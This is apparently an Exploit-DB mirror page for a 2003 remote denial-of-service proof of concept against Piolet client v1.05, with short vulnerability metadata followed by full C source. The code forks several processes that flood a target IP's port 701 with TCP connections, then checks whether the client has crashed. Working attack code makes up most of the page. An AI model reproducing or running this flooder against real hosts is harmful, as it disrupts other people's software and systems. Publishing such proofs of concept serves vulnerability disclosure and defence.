header-logo
Suggest Exploit
vendor:
Piolet client
by:
Luca Ercoli
7.5
CVSS
HIGH
Remote Denial of Service
CWE
Product Name: Piolet client
Affected Version From: 01.05
Affected Version To: 01.05
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2003

Piolet client v1.05 Remote Denial of Service

The Piolet client version 1.05 is vulnerable to a remote denial of service attack. By flooding the remote client with a large number of requests, it can be crashed. This proof of concept code demonstrates the vulnerability.

Mitigation:

There is no known mitigation or remediation for this vulnerability.
Source

Exploit-DB raw data:

/************************************************************
*                      Piolet client v1.05 Remote Denial of Service                    *
*               Proof of Concept by Luca Ercoli  luca.ercoli[at]inwind.it             *
************************************************************/

#include <stdio.h>
#include <string.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>

int ck,port=701,sd,cx=0,contatore=0,prec;

struct sockaddr_in pilot_client;

void ending(char *client){

int i;

pilot_client.sin_family = AF_INET;
pilot_client.sin_port = htons((u_short)port);
pilot_client.sin_addr.s_addr = (long)inet_addr(client);


for(i = 0; i < 100; i++){

sd = socket(AF_INET, SOCK_STREAM, 0);
ck = connect(sd, (struct sockaddr *) &pilot_client, sizeof(pilot_client)); 


if(ck != 0) { 

prec = 0;

if (prec == 0) contatore++;
if (prec == 1) contatore = 0;

if (contatore > 13) {
printf("! Remote client seems to be crashed.\n");
exit(0);
}

}
 
if(ck == 0) prec = 1;

  close(sd);
}

}

void kill_pilot(char *stringa){

short i;

  pilot_client.sin_family = AF_INET;
  pilot_client.sin_port = htons((u_short)port);
  pilot_client.sin_addr.s_addr = (long)inet_addr(stringa);
   
for(i = 0; i < 50; i++){

sd = socket(AF_INET, SOCK_STREAM, 0);
ck = connect(sd, (struct sockaddr *) &pilot_client, sizeof(pilot_client)); 


if(ck != 0) exit(0);

close(sd);

}

}

int main(int argc, char **argv)
{

short i;

 prec = 0;

  if(argc < 2)
  { 
    printf("\nUsage: %s <client-ip>\n", argv[0]);
    exit(0);
  }
  
prec=0;

printf ("\n\n+ DoS Started...\n");
printf("+ Flooding remote client...\n");

for (i=0; i<12; i++)  if(!fork()) kill_pilot(argv[1]);

printf ("+ Ending...\n");

ending(argv[1]);
  
}

// milw0rm.com [2003-08-20]

Navigation

Suggest Exploit

Services By CQR